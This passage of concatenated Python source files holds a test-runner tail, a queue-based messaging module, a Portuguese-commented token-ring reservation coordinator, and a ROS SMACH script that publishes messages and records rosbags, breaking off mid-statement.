    if threads > 1:
        # Fan out over a thread pool; result.get() re-raises any worker error.
        pool = ThreadPool(processes=threads)
        results = []
        for test in tests_to_run:
            results.append(pool.apply_async(run_test, test))
        for result in results:
            result.get()
    else:
        for test in tests_to_run:
            run_test(test[0], test[1])
    end_time = time.time()
    # TESTS_RUN / TESTS_FAILED are module-level counters updated by the
    # individual test helpers (not visible in this chunk).
    print("Ran %d tests with %d failures in %.02f seconds" % (
        TESTS_RUN, TESTS_FAILED, end_time - start_time))
    if TESTS_FAILED > 0:
        return 1
    return 0
if __name__ == '__main__':
    # Propagate the test suite's exit code to the shell.
    sys.exit(main())
|
ansible.py | from multiprocessing import Process, Queue
from Queue import Empty
from ansible_server import ansible_server
# DON'T USE THIS UNLESS YOU KNOW WHAT YOU'RE DOING
# Low level message sending. For high level messaging, use send_message.
def send(msg):
    # Non-blocking enqueue onto the queue consumed by the ansible server process.
    send_queue.put_nowait(msg)
# Use this one instead of send
def send_message(msg_type, content):
    """Send *content* wrapped in the standard envelope carrying *msg_type*."""
    envelope = {
        'header': {'msg_type': msg_type},
        'content': content,
    }
    send(envelope)
# Receives a message, or None if there is no current message.
def recv():
    """Return the next pending message without blocking, or None when empty."""
    try:
        return recv_queue.get(block=False)
    except Empty:
        return None
# Start up the Flask-SocketIO server
# Queues used to exchange messages with the server process:
# outbound (this process -> server) and inbound (server -> this process).
send_queue = Queue()
recv_queue = Queue()
# Run the ansible server in a separate process, wired to the two queues.
ansible_p = Process(target=ansible_server, args=(send_queue, recv_queue))
ansible_p.start()
|
gerenciador_de_manager.py | import threading
from requests import get, post
from time import sleep
TEMPO_POR_companhia_EM_S = 5 #quantidade de tempo que será destinada a cada companhia
class Gerenciador_de_manager:
    """Coordinates which company currently acts as the 'manager' of the
    distributed reservation system, using a token-ring style rotation over
    all known companies, with coordination done via HTTP polling (requests).
    """
    def __init__(self, companhias:dict, trajetos_para_reservar:list, who_am_i:str, semaphore_de_liberação_resolver_pedidos:threading.Semaphore, pode_fazer_reserva:bool):
        # Mapping of company name -> base URL of its HTTP API (shared reference).
        self.companhias = companhias
        # Name of the company this process represents.
        self.companhia = who_am_i
        # Shared list of pending reservation requests, consumed while we are manager.
        self.trajetos_para_reservar = trajetos_para_reservar
        # Semaphore used to signal the request-resolving thread to stop.
        self.semaphore_de_liberação_resolver_pedidos = semaphore_de_liberação_resolver_pedidos
        # Flag enabling/disabling request resolution for this company.
        self.pode_fazer_reserva = pode_fazer_reserva
        # Name of the company currently acting as manager (None until a round starts).
        self.manager = None
        # Working copy of the company list for the current rotation.
        self.temp_companhias = list(companhias)
        # True while a rotation (cycle) is in progress.
        self.ciclo = False
        # (thread, semaphore) pair of the main ring loop, or None when stopped.
        self.thread = None
        ## Check whether a manager already exists somewhere in the system.
        exist_manager = self.__verificar_se_existe_manager__()
        ## If no manager exists, start a cycle ourselves (this happens when none
        ## of the companies we know about is active).
        if(not exist_manager):
            self.init_circulo()
        ## If a manager already exists, we wait for the next cycle to join the rotation.
    def init_circulo(self):
        '''
        If no thread is running the Ring's main loop, start one.
        The paired semaphore is pre-acquired so that releasing it later
        (see end_afther_ciclo) tells the loop to stop after the current cycle.
        '''
        if(self.thread is None):
            semafaro = threading.Semaphore()
            semafaro.acquire()
            thread = threading.Thread(target=self.__main_loop__,kwargs={'semaphore':semafaro})
            thread.setDaemon(True)
            thread.start()
            self.thread = (thread,semafaro)
    def __main_loop__(self,semaphore:threading.Semaphore):
        '''
        Main loop of the Ring: cycles through the known companies in order and,
        when it is this company's turn, starts a thread that handles the
        reservation requests.
        @param semaphore: threading.Semaphore (mutex) that controls when to stop
        making new iterations of the Ring
        '''
        # acquire(False) is non-blocking: the loop keeps running until the
        # semaphore is released by end_afther_ciclo().
        while not semaphore.acquire(False):
            # Copy so that concurrent additions do not break the loop
            # (companies added later simply join the next rotation).
            self.temp_companhias = list(self.companhias)
            self.esperar_nova_rodada()
            sleep(1)
            print('[Gerenciador de manager] rodada começada')
            self.ciclo = True
            while(len(self.temp_companhias) > 0): # until every company has had its turn as manager
                self.manager = self.temp_companhias.pop() # take the next company from the list to be manager
                print(f'[Gerenciador de manager] manager atual = {self.manager}')
                # Since this list is propagated over the network, every company a new
                # company contacts ends up sharing the same list (same rotation order).
                if(self.manager == self.companhia): # if it is our company's turn
                    self.start_resolver_pedidos() # allow our own pending requests to be resolved
                else:
                    sleep(TEMPO_POR_companhia_EM_S) # sleep for the period the company is left as manager
                    # Check whether the manager is still performing an operation
                    # (once its time is up it passes the turn along, but that can
                    # take a moment while it finishes the operation in flight).
                    while(self.verificar_manager()): # while it reports being busy
                        sleep(.2) # wait 200 ms before asking again
                    # then the loop continues, moving on to the next manager
            self.ciclo = False
        semaphore.release()
        del(semaphore)
        print(f"[Gerenciador Manager] finalizando")
    def start_resolver_pedidos(self):
        '''
        Starts a thread that resolves reservation requests in the system.
        This function only returns after that thread has finished.  The thread
        body is not inlined here because this function is responsible for
        bounding the time during which the thread may operate; the thread can
        also stop early if another server decides our time slot is over.
        '''
        semaphore_resolvendo_pedido:threading.Semaphore = self.init_thread_resolver_pedidos()
        sleep(TEMPO_POR_companhia_EM_S) # wait out our time slot
        self.semaphore_de_liberação_resolver_pedidos.release() # take the semaphore back (may lag if a request is still being resolved)
        semaphore_resolvendo_pedido.acquire() # wait in case a request is still finishing when the slot ends
    def __resolver_reserva_trajeto__(self,estou_resolvendo_pedido:threading.Semaphore):
        '''
        Thread body that resolves route reservation requests.
        @param estou_resolvendo_pedido: threading.Semaphore (mutex) that controls
        when we must stop resolving requests
        '''
        self.pode_fazer_reserva=True
        self.semaphore_de_liberação_resolver_pedidos.acquire() # claim the stop semaphore
        # Keep resolving until start_resolver_pedidos() releases the semaphore.
        while not self.semaphore_de_liberação_resolver_pedidos.acquire(False):
            if(self.pode_fazer_reserva):
                if(len(self.trajetos_para_reservar) > 0):
                    estou_resolvendo_pedido.acquire()
                    pedido = self.trajetos_para_reservar.pop()
                    pedido.reservar()
                    estou_resolvendo_pedido.release()
                else:
                    sleep(.1)
            else:
                break
        self.semaphore_de_liberação_resolver_pedidos.release() # undo the acquire taken by the loop-condition check above
        self.pode_fazer_reserva = False
    def init_thread_resolver_pedidos(self) -> threading.Semaphore:
        '''
        Creates and starts the request-resolving thread.
        @return: threading.Semaphore (mutex) used to end the thread's execution
        '''
        estou_resolvendo_pedido=threading.Semaphore()
        t = threading.Thread(target = self.__resolver_reserva_trajeto__, kwargs = {"estou_resolvendo_pedido":estou_resolvendo_pedido}, daemon = True)
        # NOTE(review): redundant — daemon=True is already passed to the constructor.
        t.setDaemon(True)
        t.start()
        return estou_resolvendo_pedido
    def verificar_manager(self):
        '''
        Asks the current manager whether it is still performing an operation.
        @return: bool indicating whether the manager answered that it is busy
        '''
        try: # attempt
            resp = get(f'{self.companhias[self.manager]}/fazendo_operação', timeout = 1) # an HTTP request asking the manager if it is mid-operation
        except Exception: # on error the manager is down, hence not busy
            return False # so report False
        return resp.status_code == 201 # it answered and has not passed the turn yet, so it is still busy
    def esperar_nova_rodada(self):
        '''
        Blocks the start of the Ring until every known company answers that it
        is in the phase of starting a new cycle.
        '''
        temp_comp = self.companhias.copy()
        for companhia,href in temp_comp.items():
            keep_going = True
            while keep_going: # wait until every connected server agrees to start a new cycle
                keep_going = False
                resp = None
                try: # attempt
                    print(f'[Gerenciador de manager] esperando por {companhia=}')
                    resp = get(f'{href}/ciclo_iniciar',timeout=1) # an HTTP request asking whether that company's cycle has also ended
                except Exception as e:
                    pass
                # NOTE(review): as written, a 200 answer sets keep_going=True and
                # re-asks, while an error/other status sleeps and exits the inner
                # loop — confirm this matches the intended /ciclo_iniciar protocol.
                if(resp is not None and resp.status_code == 200):
                    keep_going = True
                else:
                    sleep(.1)
    def __verificar_se_existe_manager__(self) -> bool:
        '''
        Checks whether any known company already has a manager.  If one of them
        is already running, we conclude a Ring exists and should only start ours
        when that company asks whether we are ready to start a cycle — during
        initialization we hand our information to the known companies, so they
        know us and will ask.
        @return: bool indicating whether some known company already runs its Ring
        '''
        existe_manager = False
        comp_to_check = self.companhias.copy() # copy so a company added mid-iteration does not raise
        for companhia,href in comp_to_check.items(): # for every company we know
            try:
                resp = get(f'{href}/tem_manager',timeout=1) # ask whether it has a manager
            except Exception: # it is offline
                print(f'[Gerenciador de manager] {companhia=} nao respondeu')
                continue # skip the rest of the loop body
            # Any answer means that company is up, hence a manager exists.
            existe_manager=True
            break # one responding company is enough; stop searching
        return existe_manager
    def end_afther_ciclo(self):
        '''
        Stops the main loop's execution after the Ring's current cycle.
        '''
        thread,semafaro = self.thread
        # Releasing the semaphore makes the loop condition in __main_loop__ true,
        # so the loop exits after finishing the cycle in progress.
        semafaro.release()
        self.thread = None
if __name__ == "__main__":
    # Ad-hoc smoke test: checks that the constructor keeps a live reference to
    # the dict (mutations of `a` must be visible through gerenciador.companhias).
    # NOTE(review): this call passes only one argument while __init__ requires
    # five — as written it raises TypeError; supply the remaining arguments.
    a = {1:12}
    gerenciador = Gerenciador_de_manager(a)
    print(f'{a=} | {gerenciador.companhias=}')
    a[2] = 21
    print(f'{a=} | {gerenciador.companhias=}')
rosbag_cli_recording_1_generate_output.py | #!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
from geometry_msgs.msg import Point
from geometry_msgs.msg import Point32
from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import PoseArray
from sensor_msgs.msg import PointCloud
from sensor_msgs import point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2
from sensor_msgs.point_cloud2 import create_cloud_xyz32
import threading
import os
import subprocess
import signal
import time
def parse_pointstamped(point_input):
    """
    Parse point_input into PointStamped.

    Accepts a PointStamped (returned unchanged), a Point, a Point32, or any
    indexable [x, y, z] sequence; raises ValueError for anything else.
    """
    if isinstance(point_input, PointStamped):
        return point_input
    if isinstance(point_input, Point):
        stamped = PointStamped(point = point_input)
        stamped.header.stamp = rospy.Time.now()
        return stamped
    if isinstance(point_input, Point32):
        stamped = PointStamped(point = Point(x=point_input.x, y=point_input.y, z=point_input.z))
        stamped.header.stamp = rospy.Time.now()
        return stamped
    # Last resort: treat the input as an indexable [x, y, z] sequence.
    try:
        stamped = PointStamped(point = Point(x=point_input[0], y=point_input[1], z=point_input[2]))
        stamped.header.stamp = rospy.Time.now()
        return stamped
    except Exception as e:
        raise ValueError('Point not properly specified (should be Point, PointStamped or [3] list type)!')
def parse_posestamped(pose_input):
    """
    Parse pose_input into PoseStamped.

    Accepts a PoseStamped (returned unchanged), a Pose, or a
    [[x, y, z], [x, y, z, w]] style nested sequence; raises ValueError otherwise.
    """
    if isinstance(pose_input, PoseStamped):
        return pose_input
    if isinstance(pose_input, Pose):
        stamped = PoseStamped(pose = pose_input)
        stamped.header.stamp = rospy.Time.now()
        return stamped
    # Last resort: treat the input as a [[3], [4]] position/orientation pair.
    try:
        position = Point(x=pose_input[0][0], y=pose_input[0][1], z=pose_input[0][2])
        orientation = Quaternion(x=pose_input[1][0], y=pose_input[1][1], z=pose_input[1][2], w=pose_input[1][3])
        stamped = PoseStamped(pose = Pose(position=position, orientation=orientation))
        stamped.header.stamp = rospy.Time.now()
        return stamped
    except Exception as e:
        raise ValueError('Pose not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
def parse_posearray(posearray_input):
    """
    Parse posearray_input into a PoseArray.

    Accepts a PoseArray (returned unchanged) or a list whose elements are
    Pose, PoseStamped or [[x,y,z],[x,y,z,w]] list types.
    """
    try:
        assert isinstance(posearray_input, PoseArray)
        return posearray_input
    except:
        pass
    try:
        assert isinstance(posearray_input, list)
        posearray = PoseArray()
        for pose in posearray_input:
            # Per-element coercion: Pose as-is, PoseStamped unwrapped, or a
            # [[3],[4]] sequence converted.
            try:
                assert isinstance(pose, Pose)
                posearray.poses.append(pose)
                continue
            except:
                pass
            try:
                assert isinstance(pose, PoseStamped)
                posearray.poses.append(pose.pose)
                continue
            except:
                pass
            try:
                position = Point(x=pose[0][0], y=pose[0][1], z=pose[0][2])
                orientation = Quaternion(x=pose[1][0], y=pose[1][1], z=pose[1][2], w=pose[1][3])
                pose = Pose(position=position, orientation=orientation)
                posearray.poses.append(pose)
                continue
            except Exception as e:
                # NOTE(review): this ValueError is raised inside the outer `try`,
                # so the outer `except Exception` below catches it and replaces it
                # with the generic 'Pose array not properly specified' error —
                # the per-pose message never reaches the caller.
                raise ValueError('Pose in pose array input not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
        posearray.header.stamp = rospy.Time.now()
        return posearray
    except Exception as e:
        raise ValueError('Pose array not properly specified (should be PoseArray or list of Pose, PoseStamped or [[3],[4]] list types)!')
def parse_pointcloud(pointcloud_input):
    """
    Parse pointcloud_input into PointCloud.

    A PointCloud passes through unchanged; anything readable by
    sensor_msgs.point_cloud2 (i.e. a PointCloud2) is converted point-by-point.
    """
    if isinstance(pointcloud_input, PointCloud):
        return pointcloud_input
    try:
        xyz = pc2.read_points(pointcloud_input, skip_nans=True, field_names=('x', 'y', 'z'))
        # `map` kept deliberately: the surrounding code targets ROS/Python 2,
        # where map() yields a list as PointCloud expects.
        return PointCloud(points = map(lambda point: Point32(*point), xyz))
    except Exception as e:
        raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type): ' + repr(e))
def parse_pointcloud2(pointcloud_input):
    """
    Parse pointcloud_input into PointCloud2.

    A PointCloud2 passes through unchanged; a PointCloud is repacked into an
    xyz32 cloud that reuses the input's header.
    """
    if isinstance(pointcloud_input, PointCloud2):
        return pointcloud_input
    try:
        xyz = [[p.x, p.y, p.z] for p in pointcloud_input.points]
        return create_cloud_xyz32(header=pointcloud_input.header, points=xyz)
    except:
        raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type)!')
class MsgPublisher(object):
    """Manages background publisher threads, one per topic.

    Each started topic gets a daemonless thread that republishes the stored
    message at a fixed rate, optionally transforming it through a user
    callback before each publication.
    """
    def __init__(self):
        # A dict of message publishers indexed by topic
        self._pubs = dict()
        # A dict of messages indexed by topic
        self._msgs = dict()
        # A dict of callbacks indexed by topic
        self._callbacks = dict()
        # A dict of message publication rates indexed by topic
        self._pub_rates = dict()
        # A dict of message publisher threads indexed by topic
        self._pub_threads = dict()
        # A dict of message publisher stop flags indexed by topic
        self._stop_flags = dict()
        # Length of timeout (in seconds) for waiting for the threads to finish
        # publishing before forcibly unpublishing.
        self._unpublish_timeout = 10.0
    def _run_pub_thread(self, topic):
        """Thread body: republish the stored message for `topic` until the
        stop flag is set, then clean up via _unpublish()."""
        r = rospy.Rate(self._pub_rates[topic])
        while not self._stop_flags[topic]:
            # Apply callback to message (result replaces the stored message)
            if self._callbacks[topic]:
                try:
                    self._msgs[topic] = self._callbacks[topic](self._msgs[topic])
                except Exception as e:
                    rospy.logerr('Error when applying callback to message being published on topic {}: {}'.format(topic, repr(e)))
            # Publish message
            try:
                self._pubs[topic].publish(self._msgs[topic])
            except Exception as e:
                rospy.logerr('Error while publishing to topic {}: {}'.format(topic, repr(e)))
            r.sleep()
        self._unpublish(topic)
    def _unpublish(self, topic):
        """Unregister the topic's publisher and drop its bookkeeping entries.

        Raises whatever unregister() raised, after logging it.
        """
        try:
            self._pubs[topic].unregister()
        except Exception as e:
            rospy.logerr('Failed to unregister publisher of topic {}: {}'.format(topic, repr(e)))
            raise
        del self._pubs[topic]
        del self._msgs[topic]
        del self._callbacks[topic]
        del self._pub_rates[topic]
    def start(self, msg, topic, rate, frame_id=None, callback=None):
        """Begin publishing `msg` on `topic` at `rate` Hz.

        Returns 'succeeded', or 'aborted' if the publisher could not be
        created.  `frame_id` (str) and `callback` (callable) are optional.
        """
        # Set the message publisher stopping flag
        self._stop_flags[topic] = False
        # Save the message
        self._msgs[topic] = msg
        # Save the message publication rate
        self._pub_rates[topic] = rate
        # Use frame_id if specified
        if frame_id:
            try:
                assert(isinstance(frame_id, str))
                self._msgs[topic].header.frame_id = frame_id
            except Exception as e:
                # BUG FIX: was a bare `except` that referenced an undefined `e`,
                # which raised NameError inside the handler.
                rospy.logwarn('Failed to add specified frame_id {} to message for publication on topic {}: {}'.format(frame_id, topic, repr(e)))
        # Use callback if specified
        if callback:
            try:
                assert(callable(callback))
                self._callbacks[topic] = callback
            except Exception as e:
                # BUG FIX: was a bare `except` that referenced an undefined `e`.
                rospy.logwarn('Failed to add specified callback {} to publisher of topic {}: {}'.format(callback, topic, repr(e)))
                self._callbacks[topic] = None
        else:
            self._callbacks[topic] = None
        # Add publisher
        try:
            self._pubs[topic] = rospy.Publisher(topic, type(self._msgs[topic]))
        except Exception as e:
            # Roll back the bookkeeping recorded above.
            del self._pub_rates[topic]
            # BUG FIX: this entry was referenced (a no-op) instead of deleted.
            del self._msgs[topic]
            rospy.logwarn('Failed to add publisher for topic {}: {}'.format(topic, repr(e)))
            return 'aborted'
        # Spin up the message publication thread
        self._pub_threads[topic] = threading.Thread(target=self._run_pub_thread, args=[topic])
        self._pub_threads[topic].start()
        return 'succeeded'
    def stop(self, topic):
        """Signal the topic's publisher thread to stop and wait for it to
        unpublish; force-unpublish after the timeout.  Returns 'succeeded'
        or 'aborted'."""
        # Signal thread to stop publishing
        self._stop_flags[topic] = True
        # Wait for the topic to be unpublished
        t = rospy.get_time()
        r = rospy.Rate(self._pub_rates[topic])
        while topic in list(self._pubs.keys()):
            if rospy.get_time() - t < self._unpublish_timeout:
                r.sleep()
            else:
                break
        else:
            # Loop ended without `break`: the thread cleaned up in time.
            return 'succeeded'
        # If the publisher is still running, issue a warning and attempt forced unpublish.
        rospy.logwarn('Warning: timeout exceeded for stopping publisher thread for topic {}. Attempting forced stop...'.format(topic))
        try:
            self._unpublish(topic)
        except Exception as e:
            rospy.logerr('Error during forced stop of publisher of topic {}: {}'.format(topic, repr(e)))
            return 'aborted'
        return 'succeeded'
    def stop_all(self):
        """Stop every active publisher; 'succeeded' only if all stops succeed."""
        # BUG FIX: iterate over a snapshot of the keys, since stop() removes
        # entries from self._pubs while we iterate (RuntimeError on Python 3).
        for topic in list(self._pubs.keys()):
            if self.stop(topic) != 'succeeded':
                return 'aborted'
        return 'succeeded'
class PublishMsgState(smach.State):
    """SMACH state that starts or stops message publication via a MsgPublisher.

    `action` selects the behaviour: 'start' parses the userdata message and
    begins publishing it; 'stop' stops the publisher for one topic;
    'stop_all' stops every publisher.
    """
    def __init__(self, name, msg_publisher, action, input_keys = ['msg', 'topic', 'rate'], output_keys = ['msg', 'topic'], callbacks = None):
        smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
        # Save the state name
        self._name = name
        # Save the MsgPublisherObserver object reference
        self._msg_publisher = msg_publisher
        # Save the action
        self._action = action
        # Set up dict of parsing functions for certain message types/classes.
        self._msg_parsers = {"<class 'geometry_msgs.msg._Point.Point'>": parse_pointstamped,
                             "<class 'geometry_msgs.msg._PointStamped.PointStamped'>": parse_pointstamped,
                             "<class 'geometry_msgs.msg._Pose.Pose'>": parse_posestamped,
                             "<class 'geometry_msgs.msg._PoseStamped.PoseStamped'>": parse_posestamped,
                             "<class 'geometry_msgs.msg._PoseArray.PoseArray'>": parse_posearray,
                             "<class 'sensor_msgs.msg._PointCloud.PointCloud'>": parse_pointcloud,
                             "<class 'sensor_msgs.msg._PointCloud2.PointCloud2'>": parse_pointcloud2}
        # Resolve optional callbacks by name from globals, locals or own methods.
        self._cbs = []
        if callbacks:
            for cb in sorted(callbacks):
                if cb in globals():
                    self._cbs.append(globals()[cb])
                elif cb in locals():
                    self._cbs.append(locals()[cb])
                elif cb in dir(self):
                    self._cbs.append(getattr(self, cb))
        self._cb_input_keys = []
        self._cb_output_keys = []
        self._cb_outcomes = []
        # Register the I/O keys and outcomes declared by smach-aware callbacks.
        for cb in self._cbs:
            if cb and smach.has_smach_interface(cb):
                self._cb_input_keys.append(cb.get_registered_input_keys())
                self._cb_output_keys.append(cb.get_registered_output_keys())
                self._cb_outcomes.append(cb.get_registered_outcomes())
                self.register_input_keys(self._cb_input_keys[-1])
                self.register_output_keys(self._cb_output_keys[-1])
                self.register_outcomes(self._cb_outcomes[-1])
    def _parse_msg(self, msg, msg_type=None):
        """Coerce `msg` into a publishable ROS message, trying (in order): the
        parser registered for `msg_type`, the parser registered for the runtime
        type of `msg`, then every known parser; falls back to `msg` unchanged."""
        # First try using a known parser for a specified msg_type.
        try:
            assert msg_type
            msg_class = str(roslib.message.get_message_class(msg_type))
            published_msg = self._msg_parsers[msg_class](msg)
            return published_msg
        except:
            pass
        # Next, try to select a known parser by checking the type of message.
        try:
            msg_class = str(type(msg))
            published_msg = self._msg_parsers[msg_class](msg)
            return published_msg
        except:
            pass
        # Next, try each message type parser in succession and see if something sticks.
        for _, parser in self._msg_parsers.items():
            try:
                published_msg = parser(msg)
                return published_msg
            except:
                pass
        # Finally, if none of the above stuck, just return the original message.
        return msg
    def execute(self, userdata):
        """Run the configured action and return 'succeeded'/'aborted'."""
        # Call callbacks
        for (cb, ik, ok) in zip(self._cbs,
                                self._cb_input_keys,
                                self._cb_output_keys):
            # Call callback with limited userdata
            try:
                cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
            except:
                cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
        # Resolve the topic: from the input key if provided, otherwise derived
        # from the state name.  (BUG FIX: previously this was computed only in
        # the 'start' branch, so the 'stop' action raised NameError on `topic`.)
        if 'topic' in self._input_keys:
            topic = userdata.topic
        else:
            topic = 'smacha/' + self._name.lower()
        # Start or stop the message publisher
        outcome = 'aborted'
        if self._action == 'start':
            # Parse msg
            try:
                if 'msg_type' in self._input_keys:
                    published_msg = self._parse_msg(userdata.msg, msg_type=userdata.msg_type)
                else:
                    published_msg = self._parse_msg(userdata.msg)
            except Exception as e:
                # BUG FIX: the format string had no placeholder, so the actual
                # error text was silently dropped from the log message.
                rospy.logerr('Failed to parse message: {}'.format(repr(e)))
                return 'aborted'
            # Get rate if it's specified as an input key
            if 'rate' in self._input_keys:
                rate = userdata.rate
            else:
                rate = 100.0
            # Get callback if it's specified as an input key
            if 'callback' in self._input_keys:
                callback = userdata.callback
            else:
                callback = ''
            # Get frame_id if it's specified as an input key
            if 'frame_id' in self._input_keys:
                frame_id = userdata.frame_id
            else:
                frame_id = ''
            # Start the publisher
            outcome = self._msg_publisher.start(published_msg, topic, rate, frame_id=frame_id, callback=callback)
        elif self._action == 'stop':
            outcome = self._msg_publisher.stop(topic)
        elif self._action == 'stop_all':
            outcome = self._msg_publisher.stop_all()
        # Set topic output key if specified
        if self._action == 'start' and outcome == 'succeeded':
            for output_key in ['topic', 'output_topic', 'topic_output']:
                if output_key in self._output_keys:
                    setattr(userdata, output_key, topic)
        # Set msg output key if specified
        if self._action == 'start' and outcome == 'succeeded':
            for output_key in ['msg', 'output_msg', 'msg_output']:
                if output_key in self._output_keys:
                    setattr(userdata, output_key, published_msg)
        return outcome
class ROSBagCLIProcessRecorder(object):
    """A rosbag recorder class that uses subprocess calls to the rosbag CLI
    (command-line interface) recording tool in order to circumvent threading
    and Python GIL (global interpreter lock) issues.
    """
    def __init__(self):
        # A dict of bag recording processes indexed by bag filenames
        self._processes = dict()
    def start(self, bag_file, topics):
        """Start a rosbag recording.

        Records `topics` (all topics when empty) into `bag_file`; a timestamp
        and '.bag' suffix are appended when missing.  Returns 'succeeded' or
        'aborted'.
        """
        try:
            if not topics:
                topics = ['-a']
            if not bag_file.endswith('.bag'):
                time_str = time.strftime('%Y-%m-%d-%H-%M-%S')
                bag_file = bag_file + '_' + time_str + '.bag'
            # cmd = ['rosbag', 'record', '-j'] + topics + ['-O', bag_file]
            cmd = ['rosbag', 'record'] + topics + ['-O', bag_file]
            rospy.loginfo('Starting rosbag CLI recording with command: \'{}\''.format(' '.join(cmd)))
            self._processes[bag_file] = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        except Exception as e:
            rospy.logerr('Unable to start recording rosbag file \'{}\' with topics {}: {}'.format(bag_file, topics, repr(e)))
            return 'aborted'
        return 'succeeded'
    def stop(self, bag_file):
        """Stop a rosbag recording.
        See: https://answers.ros.org/question/10714/start-and-stop-rosbag-within-a-python-script/
        """
        try:
            rospy.loginfo('Stopping rosbag CLI recording process for rosbag file \'{}\''.format(bag_file))
            # Kill child processes: the `rosbag record` wrapper spawns a child
            # that must receive SIGINT for the bag to be finalized cleanly.
            # NOTE: shell=True with an interpolated pid is acceptable here (the
            # pid is an int from Popen), but keep it that way.
            ps_command = subprocess.Popen('ps -o pid --ppid {} --noheaders'.format(self._processes[bag_file].pid), shell=True, stdout=subprocess.PIPE)
            ps_output = ps_command.stdout.read()
            retcode = ps_command.wait()
            assert retcode == 0, 'ps command returned {}'.format(retcode)
            # BUG FIX: Popen.stdout yields bytes under Python 3; decode before
            # splitting (a no-op besides type under Python 2's ascii output).
            for pid_str in ps_output.decode().split("\n")[:-1]:
                os.kill(int(pid_str), signal.SIGINT)
            # Kill parent process
            os.kill(self._processes[bag_file].pid, signal.SIGINT)
        except Exception as e:
            rospy.logerr('Unable to terminate rosbag CLI recording process for rosbag file \'{}\': {}'.format(bag_file, repr(e)))
            return 'aborted'
        try:
            assert(os.path.exists(bag_file))
        except:
            # BUG FIX: added the missing space after the filename, which used to
            # render as "...bag'was not detected...".
            rospy.logwarn('rosbag file \'{}\' '.format(bag_file) +
                          'was not detected on the file system after rosbag CLI process recording stopped ' +
                          '(it may take more time for the process to terminate)!')
        return 'succeeded'
    def stop_all(self):
        """Stop all rosbag recordings.
        """
        for bag_file in list(self._processes.keys()):
            if self.stop(bag_file) != 'succeeded':
                return 'aborted'
        return 'succeeded'
class RecordROSBagState(smach.State):
    """SMACH state that starts/stops rosbag recordings through a bag recorder.

    `action` selects the behaviour: 'start'/'record' begins a recording for
    the userdata 'file' and 'topics' keys, 'stop' ends one recording,
    'stop_all' ends every recording.
    """
    def __init__(self, name, bag_recorder, action, input_keys=['file', 'topics'], output_keys=[], callbacks = None):
        smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
        # Save the state name
        self._name = name
        # Save the ROSBagRecorder object reference
        self._bag_recorder= bag_recorder
        # Save the action
        self._action = action
        # Resolve optional callbacks by name from globals, locals or own methods.
        self._cbs = []
        if callbacks:
            for cb in sorted(callbacks):
                if cb in globals():
                    self._cbs.append(globals()[cb])
                elif cb in locals():
                    self._cbs.append(locals()[cb])
                elif cb in dir(self):
                    self._cbs.append(getattr(self, cb))
        self._cb_input_keys = []
        self._cb_output_keys = []
        self._cb_outcomes = []
        # Register the I/O keys and outcomes declared by smach-aware callbacks.
        for cb in self._cbs:
            if cb and smach.has_smach_interface(cb):
                self._cb_input_keys.append(cb.get_registered_input_keys())
                self._cb_output_keys.append(cb.get_registered_output_keys())
                self._cb_outcomes.append(cb.get_registered_outcomes())
                self.register_input_keys(self._cb_input_keys[-1])
                self.register_output_keys(self._cb_output_keys[-1])
                self.register_outcomes(self._cb_outcomes[-1])
    def execute(self, userdata):
        """Validate userdata, run the configured recorder action, and return
        'succeeded' or 'aborted'."""
        # Call callbacks
        for (cb, ik, ok) in zip(self._cbs,
                                self._cb_input_keys,
                                self._cb_output_keys):
            # Call callback with limited userdata
            try:
                cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
            except:
                cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
        # Get filename from userdata
        try:
            bag_file = userdata.file
            assert(isinstance(bag_file, str))
        except Exception as e:
            rospy.logerr('The rosbag filename must be specified as a userdata input key: {}'.format(repr(e)))
            return 'aborted'
        # Get topic names from userdata (every element must be a string)
        try:
            topics = userdata.topics
            assert(not any(not isinstance(x, str) for x in topics))
        except Exception as e:
            rospy.logerr('Topic names must be specified as a userdata input key: {}'.format(repr(e)))
            return 'aborted'
        # Start or stop recording
        outcome = 'aborted'
        if self._action == 'start' or self._action == 'record':
            outcome = self._bag_recorder.start(bag_file, topics)
        elif self._action == 'stop':
            outcome = self._bag_recorder.stop(bag_file)
        elif self._action == 'stop_all':
            outcome = self._bag_recorder.stop_all()
        return outcome
class SleepState(smach.State):
    """SMACH state that pauses the state machine for a fixed duration."""
    def __init__(self, time, input_keys = [], output_keys = [], callbacks = [], outcomes=['succeeded']):
        smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=outcomes)
        # Duration (seconds, or anything rospy.sleep accepts) per execution.
        self._time = time
    def execute(self, userdata):
        """Block for the configured duration, then report success."""
        rospy.sleep(self._time)
        return 'succeeded'
def main():
    """Build and run the demo state machine: publish a Point message, record
    it into a rosbag via the CLI recorder for 5 seconds, then stop the
    recording and the publisher."""
    rospy.init_node('sm')
    msg_publisher = MsgPublisher()
    bag_recorder = ROSBagCLIProcessRecorder()
    sm = smach.StateMachine(outcomes=['succeeded', 'aborted'])
    # Userdata consumed by the states below.  (CLEANUP: the original assigned
    # several of these keys repeatedly; the dead earlier assignments have been
    # removed, keeping only the final effective values.)
    sm.userdata.rate = 100.0
    sm.userdata.point = Point()
    sm.userdata.topic = 'smacha/rosbag_cli_recording_1_point'
    sm.userdata.file = '/tmp/rosbag_cli_recording_1.bag'
    sm.userdata.topics = ['smacha/rosbag_cli_recording_1_point']
    with sm:
        smach.StateMachine.add('PUBLISH_MSG',
                               PublishMsgState('PUBLISH_MSG', msg_publisher, 'start'),
                               transitions={'aborted':'aborted',
                                            'succeeded':'START_RECORDING'},
                               remapping={'msg':'point',
                                          'rate':'rate',
                                          'topic':'topic'})
        smach.StateMachine.add('START_RECORDING',
                               RecordROSBagState('START_RECORDING', bag_recorder, 'start'),
